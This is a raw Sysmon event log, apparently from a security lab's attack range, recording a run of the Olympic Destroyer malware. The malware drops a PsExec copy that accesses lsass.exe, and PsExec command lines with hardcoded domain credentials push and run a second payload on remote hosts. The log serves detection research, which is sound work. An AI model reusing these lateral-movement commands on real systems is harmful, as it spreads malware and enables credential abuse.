10:57:02.035{C8EA50B7-12FD-6216-D705-000000003802}66965628C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.020{C8EA50B7-12FD-6216-D605-000000003802}65766748C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.973{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D705-000000003802}6696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.973{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-D705-000000003802}6696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.957{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D605-000000003802}6576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.935{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.919{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D505-000000003802}6596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.919{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FD-6216-D505-000000003802}6596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.888{C8EA50B7-12FD-6216-D505-000000003802}65966460C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-D205-000000003802}6424C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.857{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D505-000000003802}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.850{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.834{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.819{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{00000000-0000-0000-0000-000000000000}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.820{C8EA50B7-12FD-6216-D405-000000003802}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.819{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6484C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.803{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000291927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.803{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.787{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{00000000-0000-0000-0000-000000000000}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.798{C8EA50B7-12FD-6216-D305-000000003802}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.787{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}6160C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.787{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.772{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.772{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:01.756{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:03.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E22968D3BE4AAF6079BA17A7C0E690C,SHA256=FF2CBF87B9FA35F1A0F40D2FD64A2394FD3BD5743049ED09ECC6A34CE00CB9E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.952{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.952{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:03.936{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.867{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E805-000000003802}4320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.867{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E805-000000003802}4320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.867{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9B8D4B3EF243C6F47EDC2B25C7C18AD3,SHA256=03F921C28C67C96369D50181F9B95F81FE5FE41185FA0B622BE5CBC73914DDAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.852{C8EA50B7-12FF-6216-E805-000000003802}4320400C:\Windows\system32\conhost.exe{C8EA50B7-12FF-6216-E705-000000003802}5192C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 